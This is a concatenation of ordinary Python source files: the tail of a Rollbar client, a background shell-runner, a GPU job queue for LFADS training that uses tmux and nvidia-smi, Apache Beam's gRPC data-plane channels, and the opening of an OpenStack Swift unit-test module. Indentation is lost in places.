log.exception('Unable to decode JSON for failsafe.')
except KeyError:
log.exception('Unable to find payload parameters for failsafe.')
_send_failsafe('payload too large', uuid, host)
# TODO: Should we return here?
elif resp.status_code != 200:
log.warning("Got unexpected status code from Rollbar api: %s\nResponse:\n%s",
resp.status_code, data)
# TODO: Should we also return here?
try:
json_data = json.loads(data)
except (TypeError, ValueError):
log.exception('Could not decode Rollbar api response:\n%s', data)
raise ApiException('Request to %s returned invalid JSON response', path)
else:
if json_data.get('err'):
raise ApiError(json_data.get('message') or 'Unknown error')
result = json_data.get('result', {})
if 'page' in result:
return PagedResult(access_token, path, result['page'], params, result, endpoint=endpoint)
else:
return Result(access_token, path, params, result)
def _extract_user_ip(request):
# some common things passed by load balancers... will need more of these.
real_ip = request.headers.get('X-Real-Ip')
if real_ip:
return real_ip
forwarded_for = request.headers.get('X-Forwarded-For')
if forwarded_for:
return forwarded_for
return request.remote_addr
def _wsgi_extract_user_ip(environ):
forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
if forwarded_for:
return forwarded_for
real_ip = environ.get('HTTP_X_REAL_IP')
if real_ip:
return real_ip
return environ['REMOTE_ADDR']
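# --- Illustrative usage sketch (not part of the original module) ----------------
# Mirrors the example in report_exc_info()'s docstring: initialize with a project
# access token (placeholder below), then report a caught exception. Runs only when
# executed directly, not on import.
if __name__ == '__main__':
    init('YOUR_PROJECT_ACCESS_TOKEN', environment='development', handler='blocking')
    try:
        1 / 0
    except ZeroDivisionError:
        report_exc_info(sys.exc_info(), extra_data={'example': True})
    wait()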
|
executar.py
|
from threading import Thread
from os import system
def executar_rp(exe: str):
    '''Runs an external application.
    Parameters:
        exe (str): string with the application and its arguments
    '''
try:
system(exe)
except Exception as er:
print('executar_rp:')
print(er)
def outraRota(funcao, *args: tuple):
    '''Runs a function in parallel (in a Thread).
    Parameters:
        funcao: callable to execute in the thread
        args (tuple): positional parameters forwarded to it
            (arg1, arg2, arg3...)
    '''
try:
t = Thread(target = funcao, args = args)
t.daemon = True
t.start()
except Exception as er:
print('outraRota:')
print(er)
def executar(exe: str):
    '''Runs an external application in parallel (non-blocking).
    Parameters:
        exe (str): string with the application and its arguments
    '''
try:
outraRota(executar_rp, exe)
except Exception as er:
print('executar:')
print(er)
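# --- Illustrative usage sketch (not part of the original module) ----------------
# Launches a shell command without blocking the caller; the command string is a
# placeholder. The worker thread is a daemon, so we sleep briefly to let it finish
# before the interpreter exits.
if __name__ == '__main__':
    from time import sleep
    executar('echo hello from a background thread')
    sleep(1)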
|
lfadsqueue.py
|
# Goals
# -----
#
# What we want is to launch and monitor multiple shell scripts simultaneously.
# We have a list of tasks. Each task has a certain amount of memory that it needs in GPU memory.
#
# Launch tensorboard with all runs queued.
#
# At the start, we loop through the queue and determine whether the next task can
# run on any GPU. If so, we launch it on that GPU. On each tick (1 second), we
# repeat this basic operation: launch the first item in the queue that can run on
# some GPU, and print a message saying which GPU a new process was launched on.
#
# While this is happening, monitor each of the output processes that are in play
# and dump their output with appropriate identifying cues.
import subprocess
import os
import csv
import re
import numpy as np
import time
import shlex
from multiprocessing import Process, Queue, cpu_count, Lock
try:
from queue import Empty
except ImportError:
from Queue import Empty
import sys, traceback
import errno
# needed for synchronization to ensure tmux isn't called by multiple processes simultaneously
mutex = Lock()
class GpuStatus(object):
def __init__(self, index, name, memfree, memtotal, uuid, num_tasks=0):
self.index = index
self.name = name
self.memfree = memfree
self.memtotal = memtotal
self.uuid = uuid
self.num_tasks = num_tasks
def __repr__(self):
return 'GpuStatus {}:"{}" free {}/{} MiB, {} tasks'.format(self.index, self.name, self.memfree, self.memtotal, self.num_tasks)
def incr_num_tasks(self):
self.num_tasks += 1
def decr_num_tasks(self):
if self.num_tasks > 0:
self.num_tasks -= 1
class Task(object):
index = None
name = ''
command = '' # shell command
outfile = None # output from stdout and stderr
donefile = None # created when task completed
memory_req = 0 # memory needed on GPU
running_on_gpu = None # which GPU index running on
has_finished = False
has_failed = False
skipped_donefile_exists = False
process = None
popen = None
def is_running(self):
return self.running_on_gpu is not None and not self.has_finished
def __init__(self, index, name='', command='', memory_req=0,
outfile=None, donefile=None, tmux_session=None):
self.index = index
self.name = name
self.command = command
self.memory_req = memory_req
self.outfile = outfile
self.donefile = donefile
        # always record the tmux session (may be None)
        self.tmux_session = tmux_session
def __repr__(self):
if self.has_finished:
if self.skipped_donefile_exists:
status = 'skipped, donefile exists'
else:
status = 'finished'
elif self.is_running():
status = 'running on GPU {}'.format(self.running_on_gpu)
else:
status = 'not running'
return 'Task {} {}: mem req {}, {}'.format(self.index, self.name, self.memory_req, status)
def mark_finished_if_donefile_exists(self):
if self.donefile:
if os.path.exists(self.donefile):
self.has_finished = True
self.skipped_donefile_exists = True
def delete_donefile(self):
        if self.donefile and os.path.exists(self.donefile):
os.remove(self.donefile)
def query_gpu_status():
"""
    Calls nvidia-smi to poll GPU free memory and running compute processes.
    Returns:
        gpu_status (list of GpuStatus) : fields memfree (MiB), memtotal (MiB),
            name, uuid, num_tasks
"""
    nvidia_out = subprocess.check_output(['nvidia-smi',
                                          '--query-gpu=name,memory.free,memory.total,gpu_uuid',
                                          '--format=csv,noheader,nounits']).decode('utf-8')
nvidia_with_header = "name,memfree,memtotal,uuid\n" + nvidia_out
# parse output of nvidia-smi query
reader = csv.DictReader(nvidia_with_header.splitlines())
gpu_status = []
for idx, info in enumerate(reader):
gpu_status.append(GpuStatus(index=idx, name=info['name'].strip(),
memfree=float(info['memfree']),
memtotal=float(info['memtotal']),
uuid=info['uuid'].strip()))
# now figure out how many python processes are running on each gpu
    nvidia_out = subprocess.check_output(['nvidia-smi',
                                          '--query-compute-apps=process_name,gpu_uuid',
                                          '--format=csv,noheader,nounits']).decode('utf-8')
nvidia_with_header = "pname,uuid\n" + nvidia_out
# parse output of nvidia-smi query
reader = csv.DictReader(nvidia_with_header.splitlines())
# increment num tasks on python tasks by matching up GPU uuids
for task in reader:
if task['pname'] == 'python':
task_gpu_uuid = task['uuid'].strip()
[s.incr_num_tasks() for s in gpu_status if s.uuid == task_gpu_uuid]
return gpu_status
def find_gpu_ready_for_task(gpu_status, task):
"""
    Returns the index of the GPU in gpu_status with memfree >= task.memory_req
    and the fewest running tasks
    Args:
        gpu_status (list of GpuStatus)
        task (Task)
    Returns:
        gpu.index (int), or None if no GPU has enough free memory
"""
# of the set of GPUs with sufficient memory
gpu_eligible = [gpu for gpu in gpu_status if gpu.memfree >= task.memory_req]
if not gpu_eligible:
return None
# and the fewest running tasks. This also ensures that every GPU will be
# used at least once before tasks are doubled up
gpu = sorted(gpu_eligible, key = lambda gpu: gpu.num_tasks)[0]
return gpu.index
def find_gpu_by_index(gpu_list, index):
return [gpu for gpu in gpu_list if gpu.index == index][0]
def pick_next_task(gpu_status, tasks):
"""
Returns the index of the next task that isn't yet running and for which
there is a GPU that can run it
Args:
gpu_status : info about gpu memory usage
tasks (list of Tasks) : list of tasks to consider
Returns:
task_index
gpu_index
"""
for task_index, task in enumerate(tasks):
if not task.has_finished and not task.is_running():
gpu_index = find_gpu_ready_for_task(gpu_status, task)
if gpu_index is not None:
return (task_index, gpu_index)
return (None, None)
def check_all_tasks_completed_or_running(tasks):
return all([task.has_finished or task.is_running() for task in tasks])
def check_num_tasks_running(tasks):
return sum([1 if task.is_running() else 0 for task in tasks])
def check_all_tasks_complete(tasks):
return all([task.has_finished for task in tasks])
def build_task_list(task_specs):
return [Task(index=idx, **spec) for (idx, spec) in enumerate(task_specs)]
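# A minimal sketch of the task spec format build_task_list consumes: the keys
# mirror Task.__init__ keyword arguments; the command and paths below are
# hypothetical placeholders, not values from this project.
def _example_task_specs():
    return [
        {'name': 'run_001',
         'command': 'python train.py --run 001',     # hypothetical command
         'memory_req': 4000,                         # MiB of GPU memory needed
         'outfile': '/tmp/lfads_queue/run_001.out',  # hypothetical paths
         'donefile': '/tmp/lfads_queue/run_001.done'},
    ]
# e.g. tasks = build_task_list(_example_task_specs())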
def generate_tmux_command(name, command):
"""
Generates a tmux command that will run command in tmux session name
and wait for it to complete before returning. The bash trap ensures that the
popen subprocess will complete even if the command in tmux is Ctrl-C'ed
"""
# return "tmux new-session -ds {name} 'trap \"tmux wait-for -S {name}_done\" SIGHUP SIGTERM SIGINT; {command}; tmux wait-for -S {name}_done' && tmux wait-for {name}_done".format(name=name, command=command)
return "tmux new-session -ds {name} 'export PATH={path}; {command}'".format(path=os.environ['PATH'], name=name, command=command)
def generate_tee_command(command, outfile, append=True):
"""Appends tee redirection for stdout and stderr to a command.
Command may be a list of strings, in which case each subcommand will be tee'd
and the set will be joined by semicolons"""
if append:
tee = 'tee -a'
else:
tee = 'tee'
if type(command) is str:
return '{} 2>&1 | {} {}'.format(command, tee, outfile)
else:
commands = ['{} 2>&1 | {} {}'.format(cmd, tee, outfile) for cmd in command]
return '; '.join(commands)
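# For example (hypothetical paths), generate_tee_command('python train.py', '/tmp/run.out')
# returns "python train.py 2>&1 | tee -a /tmp/run.out"; a list of commands yields
# each subcommand tee'd the same way, joined by '; '.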
def follow_file(file):
"""Generator that reads lines appended to the end of a file"""
file.seek(0,2) # begin yielding at end of file in case we're using tee -a
while True:
line = file.readline()
if not line:
yield '' # need to yield '' so we don't close the generator
else:
yield line
def get_tail_file(filepath, nlines=3):
    return subprocess.check_output(shlex.split('tail -n {} {}'.format(nlines, filepath))).decode()
def touch_file(outfile):
# mkdir -p
if not os.path.exists(os.path.dirname(outfile)):
try:
os.makedirs(os.path.dirname(outfile))
        except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
# touch outfile to ensure it exists
    try:
        with open(outfile, 'a'):
            pass
    except IOError as exc:
        print(('Error opening out file: {}'.format(exc)))
def get_list_tmux_sessions():
    with mutex:
        return subprocess.check_output(shlex.split("tmux list-sessions -F '#{session_name}'")).decode().splitlines()
def check_tmux_session_exists(session):
return session in get_list_tmux_sessions()
def get_list_tmux_sessions_name_starts_with(prefix):
return [sess for sess in get_list_tmux_sessions() if sess.startswith(prefix)]
class TaskCompletedMessage(object):
def __init__(self, task_index, success, tail):
self.task_index = task_index
self.success = success
self.tail = tail
class TaskStartedMessage(object):
def __init__(self, task_index, pid, tmux_session):
self.task_index = task_index
self.pid = pid
self.tmux_session = tmux_session
class TaskExceptionMessage(object):
def __init__(self, task_index):
self.task_index = task_index
T, V, TB = sys.exc_info()
self.message = ''.join(traceback.format_exception(T,V,TB))
class ChildProcessError(Exception):
pass
def process_launch_task_in_tmux(queue, task, gpu_index, filter_output=True):
"""Run command in tmux and monitor output"""
def print_task(x):
print(('Task {}: {}'.format(task.name, x.rstrip('\n').strip())))
def print_relevant_output_return_success_status(outlines):
"""Prints out relevant lines of output (LFADS specific)
and return True if the graceful exit line is printed"""
task_success = False
line = next(outlines)
while line is not None and line != '':
## These strings are LFADS specific
if "Stopping optimization" in line:
# LFADS trained successfully
task_success = True
print_task(line)
# determine whether to print output
elif not filter_output or "learning rate" in line:
print_task(line)
line = next(outlines)
return task_success
try:
# touch outfile to ensure it exists
touch_file(task.outfile)
# postpend tee redirection appending to outfile
# generate_tee_command can take a list of commands too and will combine with semicolons
#append = True
#command = generate_tee_command(task.command, task.outfile, append)
# prepend gpu specification
command = 'export CUDA_VISIBLE_DEVICES={}; {}'.format(gpu_index, task.command)
# wrap in tmux session and wait for completion
tmux_command = generate_tmux_command(task.name, command)
#print(tmux_command)
# if the tmux session is already running, throw an error, usually means
# this model is already training
if check_tmux_session_exists(task.name):
print(('Queue: Task {} is already running. Monitoring'.format(task.name)))
#raise ChildProcessError('Tmux session {} already exists.'.format(task.name))
pid = None
task.running_on_gpu = None
else:
# need to launch this task
with mutex:
#print(tmux_command)
subp = subprocess.Popen(tmux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                        shell=True, universal_newlines=True)
time.sleep(0.1)
if not check_tmux_session_exists(task.name):
# usually this means that the command immediately failed
raise ChildProcessError('Tmux session immediately terminated running "{}" '.format(tmux_command))
pid = subp.pid
# notify master process we're starting
queue.put(TaskStartedMessage(task.index, pid, task.name))
# monitor outfile for output in real time and print when it comes in
task_success = False
with open(task.outfile, 'r') as outfile:
outlines = follow_file(outfile)
# while subp.poll() is None and check_tmux_session_exists(task.name):
while check_tmux_session_exists(task.name):
task_success = task_success or print_relevant_output_return_success_status(outlines)
time.sleep(1)
# check one last time after termination
task_success = task_success or print_relevant_output_return_success_status(outlines)
# Mark it finished so we don't need to redo next time
if task_success:
touch_file(task.donefile)
# notify master process that this task is done
queue.put(TaskCompletedMessage(task.index, task_success, get_tail_file(task.outfile, 10)))
except Exception as e:
# something went wrong, pass this along to main
queue.put(TaskExceptionMessage(task.index))
def print_task_status_summary(tasks):
num_finished = num_running = num_skipped = num_failed = 0
for task in tasks:
if task.skipped_donefile_exists:
num_skipped += 1
elif task.has_failed:
num_failed += 1
elif task.has_finished:
num_finished += 1
elif task.is_running():
num_running += 1
print(('Queue: {0} skipped, {1} finished, {2} failed, {3} running'
.format(num_skipped, num_finished, num_failed, num_running)))
def run_command_in_tmux_session_no_monitoring(session_name, command):
"""Run command in tmux session in a detached way, no monitoring of output"""
# wrap in tmux session and wait for completion
tmux_command = generate_tmux_command(session_name, command)
# if the tmux session is already running, throw an error, usually means
# this model is already training
if check_tmux_session_exists(session_name):
print(('Tmux session {} already exists'.format(session_name)))
raise ChildProcessError('Tmux session {} already exists.'.format(session_name))
with mutex:
subp = subprocess.Popen(tmux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                shell=True, universal_newlines=True)
return subp
def get_open_port():
"""Use bind(0) to get a free open port"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("",0))
port = s.getsockname()[1]
s.close()
return port
def launch_tensorboard_in_tmux(session_name, tensorboard_script, port):
command = 'bash {} --port={}'.format(tensorboard_script, port)
print(command)
return run_command_in_tmux_session_no_monitoring(session_name, command)
def run_lfads_queue(queue_name, tensorboard_script_path, task_specs,
gpu_list=None, one_task_per_gpu=True, max_tasks_simultaneously=None, ignore_donefile=False):
WAIT_TIME = 0.2
if 'TMUX' in os.environ:
print('Warning: tmux sessions will be nested inside the current session')
del os.environ['TMUX']
tasks = build_task_list(task_specs)
gpu_status = query_gpu_status()
if gpu_list:
gpu_status = [gpu_status[i] for i in gpu_list]
num_gpus = len(gpu_status)
# compute number of tasks we can do simultaneously
# factoring number of GPUs. If num_gpus == max_tasks_simultaneously, the
# load balancer will implicitly place one task on each gpu
num_cpus = cpu_count()
if one_task_per_gpu:
# setting max_tasks_simultaneously <= num_gpus ensures that no gpu will
# ever have more than one task due to the scheduling algorithm
if max_tasks_simultaneously is None:
max_tasks_simultaneously = num_gpus
else:
max_tasks_simultaneously = min(max_tasks_simultaneously, num_gpus)
elif max_tasks_simultaneously is None:
max_tasks_simultaneously = num_cpus-1
def print_status(x):
print(('Queue: ' + x.rstrip('\n')))
# is tensorboard running in tmux?
tensorboard_session_prefix = '{}_tensorboard'.format(queue_name)
running_tensorboard_sessions = get_list_tmux_sessions_name_starts_with(tensorboard_session_prefix)
if running_tensorboard_sessions:
# tensorboard already running
        m = re.search(r'port(?P<port>\d+)', running_tensorboard_sessions[0])
port = m.group('port') if m is not None else None
print_status('TensorBoard already running on port {} in tmux session {}'.format(port, running_tensorboard_sessions[0]))
else:
# launch the tensorboard on an open port in a tmux session (if not already open)
port = get_open_port()
tensorboard_session = '{}_port{}'.format(tensorboard_session_prefix, port)
print_status('Launching TensorBoard on port {} in tmux session {}'.format(port, tensorboard_session))
launch_tensorboard_in_tmux(tensorboard_session, tensorboard_script_path, port)
print_status('Initializing with {} GPUs and {} CPUs, max {} simultaneous tasks'
.format(len(gpu_status), num_cpus, max_tasks_simultaneously))
# check for tasks already completed
if not ignore_donefile:
for task in tasks:
task.mark_finished_if_donefile_exists()
if task.skipped_donefile_exists:
print(('Task {}: skipping, task already completed'.format(task.name)))
# communication queue for each process
message_queue = Queue(100)
while not check_all_tasks_complete(tasks):
# check queue for new messages
        do_status_summary = False
while message_queue.qsize() > 0:
try:
msg = message_queue.get_nowait()
if type(msg) is TaskStartedMessage:
task = tasks[msg.task_index]
if msg.pid is not None:
# None means the task was already running previously, so don't print anything
print(('Task {}: started in tmux session {} on GPU {} with PID {}'.format(task.name, msg.tmux_session, task.running_on_gpu, msg.pid)))
# deduct from gpu memory
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree -= task.memory_req
gpu.incr_num_tasks()
sys.stdout.flush()
elif type(msg) is TaskCompletedMessage:
task = tasks[msg.task_index]
if msg.success:
print(('Task {}: completed successfully'.format(task.name)))
else:
task.has_failed = True
if len(msg.tail) > 0:
print(('Task {}: TERMINATED UNEXPECTEDLY. Final output:'.format(task.name)))
print((msg.tail))
else:
print(('Task {}: TERMINATED UNEXPECTEDLY with no output'.format(task.name)))
task.has_finished = True
# return to available gpu memory
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree += task.memory_req
gpu.decr_num_tasks()
do_status_summary = True
sys.stdout.flush()
elif type(msg) is TaskExceptionMessage:
task = tasks[msg.task_index]
task.has_finished = True
task.has_failed = True
print(('Task {}: INTERNAL ERROR. Exception was:'.format(task.name)))
print((msg.message))
do_status_summary = True
if task.running_on_gpu is not None:
gpu = find_gpu_by_index(gpu_status, task.running_on_gpu)
gpu.memfree += task.memory_req
gpu.decr_num_tasks()
sys.stdout.flush()
else:
print(('Unknown message {}'.format(msg)))
except Empty:
pass
# check again since tasks have now been marked complete
if check_all_tasks_complete(tasks):
break
if do_status_summary:
print_task_status_summary(tasks)
# only run a certain number of tasks at the same time to avoid inefficient use of the CPUs
if check_num_tasks_running(tasks) >= max_tasks_simultaneously:
#print_status('Waiting for free CPU to become available')
time.sleep(WAIT_TIME)
            continue
if check_all_tasks_completed_or_running(tasks):
#print_status('All tasks launched or finished, waiting for last batch to complete')
time.sleep(WAIT_TIME)
            continue
# find next task for which there is sufficient GPU memory
(task_index, gpu_index) = pick_next_task(gpu_status, tasks)
if task_index is None:
#print_status('Waiting for GPU memory to become available')
time.sleep(WAIT_TIME)
            continue
task = tasks[task_index]
#print('Task {}: launching on gpu {}'.format(task.name, gpu_index))
sys.stdout.flush()
# mark task as running
task.running_on_gpu = gpu_index
# launch a process to monitor the task, also receive messages via Queue
p = Process(target=process_launch_task_in_tmux, args=(message_queue, task, gpu_index, True))
task.process = p
p.start()
time.sleep(WAIT_TIME)
print_status('All tasks completed.')
print_task_status_summary(tasks)
# wait for all the subprocesses to complete, should be quick since all tasks are reported done now
for task in tasks:
if task.process is not None:
task.process.join()
message_queue.close()
return tasks
__all__ = ['run_lfads_queue', 'query_gpu_status', 'GpuStatus', 'Task', 'get_list_tmux_sessions', 'check_tmux_session_exists']
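# A hedged end-to-end sketch: the queue name and tensorboard launch script below
# are hypothetical, and running it requires nvidia-smi and tmux on PATH; the task
# specs reuse the _example_task_specs sketch above.
if __name__ == '__main__':
    run_lfads_queue('example_queue', '/tmp/launch_tensorboard.sh',
                    _example_task_specs(), one_task_per_gpu=True)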
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future import standard_library
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
standard_library.install_aliases()
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(with_metaclass(abc.ABCMeta, object)):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
    This iterable terminates only once the full set of data has been received
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
    If this channel is shared by many instructions, it should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
  The inverse() method returns the other side of this instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
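# A hedged usage sketch mirroring the DataChannel docstring above: the two sides
# of an InMemoryDataChannel are wired so that a write on one side is read from
# the other.
#   channel = InMemoryDataChannel()
#   out = channel.output_stream(instruction_id, target)
#   out.write(encoded_bytes)
#   out.close()  # appends an Elements.Data message to channel.inverse()._inputs
#   for data in channel.inverse().input_elements(instruction_id, [target]):
#       ...      # data.data holds the bytes written above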
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_targets):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_targets(collection): expected targets
"""
received = self._receiving_queue(instruction_id)
done_targets = []
try:
while len(done_targets) < len(expected_targets):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
else:
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
finally:
      # Instruction ids are not reusable, so clean up the receiving queue once
      # we are done with an instruction_id
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane')
self._exc_info = sys.exc_info()
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self, credentials=None):
self._data_channel_cache = {}
self._lock = threading.Lock()
self._credentials = None
if credentials is not None:
logging.info('Using secure channel creds.')
self._credentials = credentials
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
grpc_channel = None
if self._credentials is None:
grpc_channel = grpc.insecure_channel(url, options=channel_options)
else:
grpc_channel = grpc.secure_channel(
url, self._credentials, options=channel_options)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
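# A hedged sketch of typical factory use, assuming a RemoteGrpcPort-like message
# whose api_service_descriptor.url names the runner's data endpoint; repeated
# calls with the same url reuse the cached channel.
#   factory = GrpcClientDataChannelFactory(credentials=None)
#   channel = factory.create_data_channel(remote_grpc_port)  # remote_grpc_port assumed given
#   ...
#   factory.close()  # closes every cached GrpcClientDataChannel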
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import contextlib
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import sys
import json
import math
import six
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import Timeout, MessageTimeout, \
ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \
MimeInvalid
from swift.common import utils
from swift.common.utils import is_valid_ip, is_valid_ipv4, is_valid_ipv6
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.swob import Request, Response
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
